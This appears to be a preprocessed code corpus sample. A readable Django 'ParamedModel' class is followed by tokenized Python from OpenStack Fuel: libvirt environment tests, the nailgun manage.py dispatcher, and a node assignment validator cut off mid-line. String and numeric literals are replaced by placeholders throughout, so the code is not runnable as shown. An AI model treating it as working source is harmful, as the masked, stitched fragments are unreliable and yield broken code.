    """Abstract model storing extra attributes in a JSON ``params`` field."""

    class Meta(object):
        abstract = True

    objects = ParamedModelManager()
    # NOTE(review): a mutable ``{}`` default is shared between field
    # instances; ``default=dict`` is the usual safe spelling — confirm
    # jsonfield copies it per row.
    params = jsonfield.JSONField(default={})
    # Dotted path of the concrete subclass, used by the metaclass to
    # re-cast loaded instances.
    _class = ParamField()

    @classmethod
    def get_defined_params(cls):
        """Return param names declared anywhere in the class's MRO."""
        param_names = []
        for basecls in cls.__mro__:
            if not hasattr(basecls, '<STR_LIT>'):
                continue
            param_names += basecls._param_field_names
        return param_names

    def set_default_params(self):
        """Seed ``params`` with defaults for every declared param field."""
        for basecls in self.__class__.__mro__:
            if not hasattr(basecls, '<STR_LIT>'):
                continue
            for param in basecls._param_field_names:
                # Use __dict__ to reach the raw descriptor, not its value.
                basecls.__dict__[param].set_default_value(self)

    def save(self, *args, **kwargs):
        """Persist the instance, recording its concrete class path first."""
        self._class = loader.get_class_path(self)
        self.set_default_params()
        return super(ParamedModel, self).save(*args, **kwargs)
<s> import collections <EOL> import os <EOL> import mock <EOL> from netaddr import IPAddress <EOL> import yaml <EOL> from devops . models import AddressPool <EOL> from devops . models import Environment <EOL> from devops . tests . driver . libvirt . base import LibvirtTestCase <EOL> ENV_TMPLT = """<STR_LIT>""" <EOL> class TestLibvirtTemplate ( LibvirtTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestLibvirtTemplate , self ) . setUp ( ) <EOL> self . sleep_mock = self . patch ( '<STR_LIT>' ) <EOL> self . open_mock = mock . mock_open ( read_data = '<STR_LIT>' ) <EOL> self . patch ( '<STR_LIT>' , <EOL> self . open_mock , create = True ) <EOL> self . os_mock = self . patch ( '<STR_LIT>' ) <EOL> self . os_mock . urandom = os . urandom <EOL> Size = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> self . file_sizes = { <EOL> '<STR_LIT>' : Size ( st_size = <NUM_LIT> ) , <EOL> } <EOL> self . os_mock . stat . side_effect = self . file_sizes . get <EOL> self . full_conf = yaml . load ( ENV_TMPLT ) <EOL> self . env = Environment . create_environment ( self . full_conf ) <EOL> self . d = self . env . get_group ( name = '<STR_LIT>' ) . driver <EOL> def test_ips ( self ) : <EOL> admin_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> pub_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> stor_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> mng_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> priv_net = AddressPool . objects . get ( <EOL> name = '<STR_LIT>' ) . ip_network <EOL> def assert_ip_in_net ( ip , net ) : <EOL> assert IPAddress ( ip ) in net <EOL> admin_node = self . env . get_node ( name = '<STR_LIT>' ) <EOL> adm_eth0 = admin_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( adm_eth0 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( adm_eth0 . addresses [ <NUM_LIT:0> ] . 
ip_address , admin_net ) <EOL> for node_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> slave_node = self . env . get_node ( name = node_name ) <EOL> slave_eth0 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth0 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth0 . addresses [ <NUM_LIT:0> ] . ip_address , admin_net ) <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth2 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth2 . addresses [ <NUM_LIT:0> ] . ip_address , pub_net ) <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth2 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth2 . addresses [ <NUM_LIT:0> ] . ip_address , stor_net ) <EOL> slave_eth3 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth3 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth3 . addresses [ <NUM_LIT:0> ] . ip_address , mng_net ) <EOL> slave_eth4 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert len ( slave_eth4 . addresses ) == <NUM_LIT:1> <EOL> assert_ip_in_net ( slave_eth4 . addresses [ <NUM_LIT:0> ] . ip_address , priv_net ) <EOL> def test_db ( self ) : <EOL> assert len ( self . env . group_set . all ( ) ) == <NUM_LIT:1> <EOL> group = self . env . get_group ( name = '<STR_LIT>' ) <EOL> assert group <EOL> assert len ( self . env . addresspool_set . all ( ) ) == <NUM_LIT:5> <EOL> get_ap = self . env . get_address_pool <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT:0> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT:0> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . 
tag == <NUM_LIT> <EOL> assert get_ap ( name = '<STR_LIT>' ) <EOL> assert get_ap ( name = '<STR_LIT>' ) . tag == <NUM_LIT> <EOL> get_l2nd = group . get_l2_network_device <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode == '<STR_LIT>' <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode == '<STR_LIT>' <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert get_l2nd ( name = '<STR_LIT>' ) <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . forward . mode is None <EOL> assert get_l2nd ( name = '<STR_LIT>' ) . dhcp is False <EOL> assert len ( self . env . get_nodes ( ) ) == <NUM_LIT:3> <EOL> admin_node = self . env . get_node ( name = '<STR_LIT>' ) <EOL> assert admin_node . role == '<STR_LIT>' <EOL> assert admin_node . vcpu == <NUM_LIT:2> <EOL> assert admin_node . memory == <NUM_LIT> <EOL> assert admin_node . hypervisor == '<STR_LIT:test>' <EOL> assert admin_node . architecture == '<STR_LIT>' <EOL> assert admin_node . boot == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> adm_sys_vol = admin_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert adm_sys_vol . capacity == <NUM_LIT:10> <EOL> assert adm_sys_vol . format == '<STR_LIT>' <EOL> adm_sys_disk = admin_node . diskdevice_set . get ( volume = adm_sys_vol ) <EOL> assert adm_sys_disk . device == '<STR_LIT>' <EOL> assert adm_sys_disk . bus == '<STR_LIT>' <EOL> assert adm_sys_disk . target_dev == '<STR_LIT>' <EOL> adm_iso_vol = admin_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert adm_iso_vol . 
capacity is None <EOL> assert adm_iso_vol . source_image == '<STR_LIT>' <EOL> assert adm_iso_vol . format == '<STR_LIT>' <EOL> adm_iso_disk = admin_node . diskdevice_set . get ( volume = adm_iso_vol ) <EOL> assert adm_iso_disk . device == '<STR_LIT>' <EOL> assert adm_iso_disk . bus == '<STR_LIT>' <EOL> assert adm_iso_disk . target_dev == '<STR_LIT>' <EOL> adm_eth0 = admin_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert adm_eth0 . label == '<STR_LIT>' <EOL> assert adm_eth0 . model == '<STR_LIT>' <EOL> assert adm_eth0 . l2_network_device . name == '<STR_LIT>' <EOL> adm_nc = admin_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert adm_nc . label == '<STR_LIT>' <EOL> assert adm_nc . networks == [ '<STR_LIT>' ] <EOL> assert adm_nc . parents == [ ] <EOL> assert adm_nc . aggregation is None <EOL> for slave_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> slave_node = self . env . get_node ( name = slave_name ) <EOL> assert slave_node . role == '<STR_LIT>' <EOL> assert slave_node . vcpu == <NUM_LIT:2> <EOL> assert slave_node . memory == <NUM_LIT> <EOL> assert slave_node . hypervisor == '<STR_LIT:test>' <EOL> assert slave_node . architecture == '<STR_LIT>' <EOL> assert slave_node . boot == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> slave_sys_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_sys_vol <EOL> assert slave_sys_vol . capacity == <NUM_LIT:10> <EOL> assert slave_sys_vol . format == '<STR_LIT>' <EOL> slave_sys_disk = slave_node . diskdevice_set . get ( <EOL> volume = slave_sys_vol ) <EOL> assert slave_sys_disk . device == '<STR_LIT>' <EOL> assert slave_sys_disk . bus == '<STR_LIT>' <EOL> assert slave_sys_disk . target_dev == '<STR_LIT>' <EOL> slave_cinder_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_cinder_vol <EOL> assert slave_cinder_vol . capacity == <NUM_LIT:10> <EOL> assert slave_cinder_vol . format == '<STR_LIT>' <EOL> slave_cinder_disk = slave_node . diskdevice_set . 
get ( <EOL> volume = slave_cinder_vol ) <EOL> assert slave_cinder_disk . device == '<STR_LIT>' <EOL> assert slave_cinder_disk . bus == '<STR_LIT>' <EOL> assert slave_cinder_disk . target_dev == '<STR_LIT>' <EOL> slave_swift_vol = slave_node . get_volume ( name = '<STR_LIT>' ) <EOL> assert slave_swift_vol <EOL> assert slave_swift_vol . capacity == <NUM_LIT:10> <EOL> assert slave_swift_vol . format == '<STR_LIT>' <EOL> slave_swift_disk = slave_node . diskdevice_set . get ( <EOL> volume = slave_swift_vol ) <EOL> assert slave_swift_disk . device == '<STR_LIT>' <EOL> assert slave_swift_disk . bus == '<STR_LIT>' <EOL> assert slave_swift_disk . target_dev == '<STR_LIT>' <EOL> slave_eth0 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth0 <EOL> assert slave_eth0 . label == '<STR_LIT>' <EOL> assert slave_eth0 . model == '<STR_LIT>' <EOL> assert slave_eth0 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth1 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth1 <EOL> assert slave_eth1 . label == '<STR_LIT>' <EOL> assert slave_eth1 . model == '<STR_LIT>' <EOL> assert slave_eth1 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth2 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth2 <EOL> assert slave_eth2 . label == '<STR_LIT>' <EOL> assert slave_eth2 . model == '<STR_LIT>' <EOL> assert slave_eth2 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth3 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth3 <EOL> assert slave_eth3 . label == '<STR_LIT>' <EOL> assert slave_eth3 . model == '<STR_LIT>' <EOL> assert slave_eth3 . l2_network_device . name == '<STR_LIT>' <EOL> slave_eth4 = slave_node . interface_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth4 <EOL> assert slave_eth4 . label == '<STR_LIT>' <EOL> assert slave_eth4 . model == '<STR_LIT>' <EOL> assert slave_eth4 . l2_network_device . 
name == '<STR_LIT>' <EOL> slave_eth0_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth0_nc <EOL> assert slave_eth0_nc . label == '<STR_LIT>' <EOL> assert slave_eth0_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth0_nc . parents == [ ] <EOL> assert slave_eth0_nc . aggregation is None <EOL> slave_eth1_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth1_nc <EOL> assert slave_eth1_nc . label == '<STR_LIT>' <EOL> assert slave_eth1_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth1_nc . parents == [ ] <EOL> assert slave_eth1_nc . aggregation is None <EOL> slave_eth2_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth2_nc <EOL> assert slave_eth2_nc . label == '<STR_LIT>' <EOL> assert slave_eth2_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth2_nc . parents == [ ] <EOL> assert slave_eth2_nc . aggregation is None <EOL> slave_eth3_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth3_nc <EOL> assert slave_eth3_nc . label == '<STR_LIT>' <EOL> assert slave_eth3_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth3_nc . parents == [ ] <EOL> assert slave_eth3_nc . aggregation is None <EOL> slave_eth4_nc = slave_node . networkconfig_set . get ( label = '<STR_LIT>' ) <EOL> assert slave_eth4_nc <EOL> assert slave_eth4_nc . label == '<STR_LIT>' <EOL> assert slave_eth4_nc . networks == [ '<STR_LIT>' ] <EOL> assert slave_eth4_nc . parents == [ ] <EOL> assert slave_eth4_nc . aggregation is None <EOL> def test_life_cycle ( self ) : <EOL> assert len ( self . d . get_allocated_networks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listDefinedNetworks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listDefinedDomains ( ) ) == <NUM_LIT:0> <EOL> self . env . define ( ) <EOL> nets = map ( str , self . d . 
get_allocated_networks ( ) ) <EOL> assert sorted ( nets ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert sorted ( self . d . conn . listDefinedNetworks ( ) ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> assert sorted ( self . d . conn . listDefinedDomains ( ) ) == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . env . start ( ) <EOL> networks = self . d . conn . listAllNetworks ( ) <EOL> assert len ( networks ) == <NUM_LIT:5> <EOL> for network in networks : <EOL> assert network . isActive ( ) <EOL> domains = self . d . conn . listAllDomains ( ) <EOL> assert len ( domains ) == <NUM_LIT:3> <EOL> for domain in domains : <EOL> assert domain . isActive ( ) <EOL> self . env . destroy ( ) <EOL> networks = self . d . conn . listAllNetworks ( ) <EOL> assert len ( networks ) == <NUM_LIT:5> <EOL> for network in networks : <EOL> assert network . isActive ( ) <EOL> domains = self . d . conn . listAllDomains ( ) <EOL> assert len ( domains ) == <NUM_LIT:3> <EOL> for domain in domains : <EOL> assert not domain . isActive ( ) <EOL> self . env . erase ( ) <EOL> assert len ( self . d . get_allocated_networks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listAllNetworks ( ) ) == <NUM_LIT:0> <EOL> assert len ( self . d . conn . listAllDomains ( ) ) == <NUM_LIT:0> </s>
<s> import __main__ <EOL> import argparse <EOL> import code <EOL> import os <EOL> import sys <EOL> def add_config_parameter ( parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = None <EOL> ) <EOL> def load_run_parsers ( subparsers ) : <EOL> run_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:port>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT:address>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , default = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( run_parser ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> run_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , type = str , <EOL> help = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:none>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> def load_db_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> loaddata_parser = subparsers . 
add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> loaddata_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' <EOL> ) <EOL> dumpdata_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> dumpdata_parser . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> generate_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' , required = True <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , type = int , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> generate_parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> type = int , default = <NUM_LIT:1> , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> def load_alembic_parsers ( migrate_parser ) : <EOL> alembic_parser = migrate_parser . add_subparsers ( <EOL> dest = "<STR_LIT>" , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> parser = alembic_parser . add_parser ( name ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> parser = alembic_parser . add_parser ( name ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:?>' ) <EOL> parser = alembic_parser . add_parser ( '<STR_LIT>' ) <EOL> parser . 
add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser = alembic_parser . add_parser ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> def load_db_migrate_parsers ( subparsers ) : <EOL> migrate_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> load_alembic_parsers ( migrate_parser ) <EOL> def load_dbshell_parsers ( subparsers ) : <EOL> dbshell_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( dbshell_parser ) <EOL> def load_test_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT:test>' , help = '<STR_LIT>' <EOL> ) <EOL> def load_shell_parsers ( subparsers ) : <EOL> shell_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> add_config_parameter ( shell_parser ) <EOL> def load_settings_parsers ( subparsers ) : <EOL> subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' <EOL> ) <EOL> def load_extensions_parsers ( subparsers ) : <EOL> extensions_parser = subparsers . add_parser ( <EOL> '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> load_alembic_parsers ( extensions_parser ) <EOL> def action_dumpdata ( params ) : <EOL> import logging <EOL> logging . disable ( logging . WARNING ) <EOL> from nailgun . db . sqlalchemy import fixman <EOL> fixman . dump_fixture ( params . model ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def action_generate_nodes_fixture ( params ) : <EOL> from oslo_serialization import jsonutils <EOL> from nailgun . logger import logger <EOL> from nailgun . utils import fake_generator <EOL> logger . info ( '<STR_LIT>' ) <EOL> total_nodes_count = params . total_nodes <EOL> fixtures_dir = os . path . join ( os . path . dirname ( os . path . 
abspath ( __file__ ) ) , <EOL> '<STR_LIT>' ) <EOL> file_path = os . path . join ( <EOL> fixtures_dir , <EOL> '<STR_LIT>' . format ( total_nodes_count ) <EOL> ) <EOL> generator = fake_generator . FakeNodesGenerator ( ) <EOL> res = generator . generate_fake_nodes ( <EOL> total_nodes_count , error_nodes_count = params . error_nodes , <EOL> offline_nodes_count = params . offline_nodes , <EOL> min_ifaces_num = params . min_ifaces_num ) <EOL> with open ( file_path , '<STR_LIT:w>' ) as file_to_write : <EOL> jsonutils . dump ( res , file_to_write , indent = <NUM_LIT:4> ) <EOL> logger . info ( '<STR_LIT>' . format ( file_path ) ) <EOL> def action_loaddata ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> with open ( params . fixture , "<STR_LIT:r>" ) as fileobj : <EOL> fixman . upload_fixture ( fileobj ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_loadfakedeploymenttasks ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . load_fake_deployment_tasks ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_loaddefault ( params ) : <EOL> from nailgun . db . sqlalchemy import fixman <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . upload_fixtures ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> fixman . load_fake_deployment_tasks ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_syncdb ( params ) : <EOL> from nailgun . db import syncdb <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> syncdb ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_dropdb ( params ) : <EOL> from nailgun . db import dropdb <EOL> from nailgun . logger import logger <EOL> logger . info ( "<STR_LIT>" ) <EOL> dropdb ( ) <EOL> logger . 
info ( "<STR_LIT>" ) <EOL> def action_migrate ( params ) : <EOL> from nailgun . db . migration import action_migrate_alembic_core <EOL> action_migrate_alembic_core ( params ) <EOL> def action_extensions ( params ) : <EOL> from nailgun . logger import logger <EOL> from nailgun . db . migration import action_migrate_alembic_extension <EOL> from nailgun . extensions import get_all_extensions <EOL> for extension in get_all_extensions ( ) : <EOL> if extension . alembic_migrations_path ( ) : <EOL> logger . info ( '<STR_LIT>' . format ( <EOL> extension . full_name ( ) ) ) <EOL> action_migrate_alembic_extension ( params , extension = extension ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( extension . full_name ( ) ) ) <EOL> def action_test ( params ) : <EOL> from nailgun . logger import logger <EOL> from nailgun . unit_test import TestRunner <EOL> logger . info ( "<STR_LIT>" ) <EOL> TestRunner . run ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def action_dbshell ( params ) : <EOL> from nailgun . settings import settings <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> args = [ '<STR_LIT>' ] <EOL> env = { } <EOL> if settings . DATABASE [ '<STR_LIT>' ] : <EOL> env [ '<STR_LIT>' ] = settings . DATABASE [ '<STR_LIT>' ] <EOL> if settings . DATABASE [ '<STR_LIT:user>' ] : <EOL> args += [ "<STR_LIT>" , settings . DATABASE [ '<STR_LIT:user>' ] ] <EOL> if settings . DATABASE [ '<STR_LIT:host>' ] : <EOL> args . extend ( [ "<STR_LIT>" , settings . DATABASE [ '<STR_LIT:host>' ] ] ) <EOL> if settings . DATABASE [ '<STR_LIT:port>' ] : <EOL> args . extend ( [ "<STR_LIT>" , str ( settings . DATABASE [ '<STR_LIT:port>' ] ) ] ) <EOL> args += [ settings . DATABASE [ '<STR_LIT:name>' ] ] <EOL> if os . name == '<STR_LIT>' : <EOL> sys . exit ( os . system ( "<STR_LIT:U+0020>" . join ( args ) ) ) <EOL> else : <EOL> os . 
execvpe ( '<STR_LIT>' , args , env ) <EOL> def action_dump_settings ( params ) : <EOL> from nailgun . settings import settings <EOL> sys . stdout . write ( settings . dump ( ) ) <EOL> def action_shell ( params ) : <EOL> from nailgun . db import db <EOL> from nailgun . settings import settings <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> try : <EOL> from IPython import embed <EOL> embed ( ) <EOL> except ImportError : <EOL> code . interact ( local = { '<STR_LIT>' : db , '<STR_LIT>' : settings } ) <EOL> def action_run ( params ) : <EOL> from nailgun . settings import settings <EOL> settings . update ( { <EOL> '<STR_LIT>' : int ( params . port ) , <EOL> '<STR_LIT>' : params . address , <EOL> } ) <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> param = getattr ( params , attr . lower ( ) ) <EOL> if param is not None : <EOL> settings . update ( { attr : param } ) <EOL> if params . authentication_method : <EOL> auth_method = params . authentication_method <EOL> settings . AUTH . update ( { '<STR_LIT>' : auth_method } ) <EOL> if params . config_file : <EOL> settings . update_from_file ( params . config_file ) <EOL> from nailgun . app import appstart <EOL> appstart ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( <EOL> dest = "<STR_LIT:action>" , help = '<STR_LIT>' <EOL> ) <EOL> load_run_parsers ( subparsers ) <EOL> load_db_parsers ( subparsers ) <EOL> load_db_migrate_parsers ( subparsers ) <EOL> load_dbshell_parsers ( subparsers ) <EOL> load_test_parsers ( subparsers ) <EOL> load_shell_parsers ( subparsers ) <EOL> load_settings_parsers ( subparsers ) <EOL> load_extensions_parsers ( subparsers ) <EOL> params , other_params = parser . parse_known_args ( ) <EOL> sys . argv . pop ( <NUM_LIT:1> ) <EOL> action = getattr ( <EOL> __main__ , <EOL> "<STR_LIT>" . format ( params . 
action ) <EOL> ) <EOL> action ( params ) if action else parser . print_help ( ) </s>
<s> from operator import attrgetter <EOL> import sqlalchemy as sa <EOL> from nailgun . api . v1 . validators . base import BasicValidator <EOL> from nailgun . api . v1 . validators . json_schema . assignment import assignment_format_schema <EOL> from nailgun . api . v1 . validators . json_schema . assignment import unassignment_format_schema <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy . models import Node <EOL> from nailgun import errors <EOL> from nailgun . expression import Expression <EOL> from nailgun import objects <EOL> class AssignmentValidator ( BasicValidator ) : <EOL> predicate = None <EOL> done_error_msg_template = None <EOL> @ staticmethod <EOL> def check_all_nodes ( nodes , node_ids ) : <EOL> not_found_node_ids = set ( node_ids ) - set ( n . id for n in nodes ) <EOL> if not_found_node_ids : <EOL> raise errors . InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( <EOL> "<STR_LIT:U+002C>" . join ( map ( str , not_found_node_ids ) ) <EOL> ) , log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_if_already_done ( cls , nodes ) : <EOL> already_done_nodes = filter ( cls . predicate , nodes ) <EOL> if any ( already_done_nodes ) : <EOL> raise errors . InvalidData ( <EOL> cls . done_error_msg_template <EOL> . format ( "<STR_LIT:U+002C>" . join ( map ( str , already_done_nodes ) ) ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_unique_hostnames ( cls , nodes , cluster_id ) : <EOL> hostnames = [ node . hostname for node in nodes ] <EOL> conflicting_hostnames = [ <EOL> x [ <NUM_LIT:0> 